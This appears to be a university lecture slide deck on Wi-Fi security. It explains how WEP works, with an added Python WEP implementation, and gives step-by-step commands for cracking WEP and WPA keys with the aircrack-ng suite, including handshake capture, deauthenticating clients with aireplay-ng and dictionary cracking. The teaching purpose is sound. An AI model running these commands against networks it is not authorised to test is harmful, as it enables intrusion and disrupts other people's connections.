WLAN Security: Cracking WEP/WPA รศ. ดร. อนันต์ ผลเพิ่ม Assoc. Prof. Anan Phonphoem, Ph.D. Computer Engineering.


1 WLAN Security: Cracking WEP/WPA
รศ. ดร. อนันต์ ผลเพิ่ม (Assoc. Prof. Anan Phonphoem, Ph.D.)
Computer Engineering Department, Kasetsart University, Bangkok, Thailand
Wireless LANs 2011

2 WEP Block Diagram
[Diagram: WEP Frame] Encryption block (sender site): Secret Key (40-bit or 128-bit), Initialization Vector (IV), Pseudo-Random Number Generator (RC-4), Key Sequence, Plain Text, Integrity Algorithm (CRC-32), Integrity Check Value (ICV), Bitwise XOR, Cipher Text, IV.
[Diagram] Decryption block (receiver site): IV, Secret Key (40-bit or 128-bit), Pseudo-Random Number Generator, Key Sequence, Cipher Text, Bitwise XOR, Plain Text, Integrity Algorithm, Integrity Check Value (ICV).

3 WEP – Encoding
[Diagram] Secret Key (40-bit or 128-bit), Initialization Vector (IV), Pseudo-Random Number Generator (RC-4), Key Sequence, Plain Text, Integrity Algorithm (CRC-32), Integrity Check Value (ICV), Bitwise XOR, Cipher Text, IV.

4 WEP Frame
[Diagram] Frame layout: Frame Header, IV Header, Frame Body, ICV Trailer, FCS. Labels: Encrypted, Clear Text, 4 bytes.

5 WEP – Decryption
[Diagram] IV, Secret Key (40-bit or 128-bit), Pseudo-Random Number Generator, Key Sequence, Cipher Text, Bitwise XOR, Plain Text, Integrity Algorithm, Integrity Check Value (ICV).
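
The encoding and decryption blocks of slides 2 to 5, written out as an added Python example (not part of the original slides). It assumes the standard 802.11 details the slides do not spell out: a 24-bit IV, a 4-byte IV header whose last byte carries the key ID, and a little-endian ICV. The MAC frame header and FCS are left out, and the key and payload are constructed sample values.

```python
import struct
import zlib

def rc4(seed: bytes, n: int) -> bytes:
    """RC4 used as the pseudo-random number generator: n bytes of key sequence."""
    s, j = list(range(256)), 0
    for i in range(256):                                # key scheduling
        j = (j + s[i] + seed[i % len(seed)]) % 256
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):                                  # output generation
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) % 256])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv_of(plaintext: bytes) -> bytes:
    """Integrity algorithm: CRC-32 of the plain text, 4 bytes little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)

def wep_encode(secret_key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Sender site: clear IV header, then encrypted frame body and ICV trailer."""
    assert len(iv) == 3 and 0 <= key_id <= 3
    data = plaintext + icv_of(plaintext)
    key_sequence = rc4(iv + secret_key, len(data))      # seed = IV || secret key
    iv_header = iv + bytes([key_id << 6])               # 4 bytes, sent in clear
    return iv_header + xor(data, key_sequence)

def wep_decode(secret_key: bytes, frame: bytes) -> bytes:
    """Receiver site: rebuild the key sequence from the clear IV, check the ICV."""
    iv, encrypted = frame[:3], frame[4:]
    data = xor(encrypted, rc4(iv + secret_key, len(encrypted)))
    plaintext, icv = data[:-4], data[-4:]
    if icv != icv_of(plaintext):
        raise ValueError("ICV mismatch: wrong key or modified frame")
    return plaintext

if __name__ == "__main__":
    key = bytes.fromhex("0102030405")                   # constructed 40-bit key
    frame = wep_encode(key, bytes.fromhex("aabbcc"), b"hello wlan")
    print(frame.hex(), wep_decode(key, frame))
```

The receiver needs nothing secret from the frame itself: the IV travels in clear text, and only the frame body and ICV are covered by the key sequence.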

6 Cracking WEP

7 Cracking Steps
1) Reconnaissance (collect target info.) [kismet]
2) Run promiscuous mode [iwconfig, airmon]
3) Collect data [airodump]
4) Crack key [aircrack]

8 Default SSIDs

9 1) Reconnaissance (Collect target info.)

10 Kismet (Reconnaissance)

11 Kismet (AP Info.)

12 Kismet (Client Info.)

13 2) Run promiscuous mode

14 Regular Behavior: Station 1 transmits to all (broadcast)

15 Intention to Eavesdrop: Promiscuous mode. Station 1 transmits to station 4

16 iwconfig

17 iwlist

18 Promiscuous Mode Setup: by using iwconfig

19 Promiscuous Mode Setup: by using airmon-ng

20 Promiscuous Mode Setup

21 3) Collect data

22 airodump: From Kismet

23 Airodump problem
airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is the Linux kernel subsystem for controlling radio transmitters (activated/deactivated).
rfkill list
0: phy0: Wireless LAN
    Soft blocked: no    → software can reactivate
    Hard blocked: no    → software cannot reactivate
1: acer-wireless: Wireless LAN
    Soft blocked: no
    Hard blocked: no
2: acer-bluetooth: Bluetooth
    Soft blocked: no
    Hard blocked: no
4: hci0: Bluetooth
    Soft blocked: no
    Hard blocked: no
Solve by: rfkill unblock all

24 airodump

25 airodump data files

26 4) Crack Key

27 aircrack: For non-encryption

28 aircrack

29 WEP Cracking Demo

30 Cracking WPA

31 Cracking Steps
1) Start the wireless interface in monitor mode on the specific AP channel
2) Start airodump-ng on the AP channel with a filter for the bssid to collect the authentication handshake
3) Use aireplay-ng to deauthenticate the wireless client
4) Run aircrack-ng to crack the pre-shared key using the authentication handshake

32 1) Start Monitoring Mode

33 Check interface

34 iwconfig

35 Start monitoring mode

36 2) Start airodump-ng to collect the authentication handshake

37 Start airodump-ng
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0
Parameter | Description
-c 6 | Wireless channel
--bssid 00:1E:F7:xx:xx:xx | AP's MAC
-w psk | File name prefix (contains IVs)
mon0 | Interface name

38 Start airodump-ng with fewer parameters
Moose# airodump-ng -w psk mon0

39 3) Deauthenticate client

40 aireplay
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0
Parameter | Description
-0 | Deauthentication
1 | Number of deauthentications sent
-a 00:12:01:xx:xx:xx | AP's MAC
-c 00:23:11:xx:xx:xx | MAC of the client being deauthenticated
mon0 | Interface name

41 4) Crack

42 Need a dictionary
Moose# aircrack-ng -b 00:12:01:xx:xx:xx psk*.cap

43 With dictionary
Moose# aircrack-ng -w password.lst psk*.cap

44 Handshake found

45 Successfully Cracked

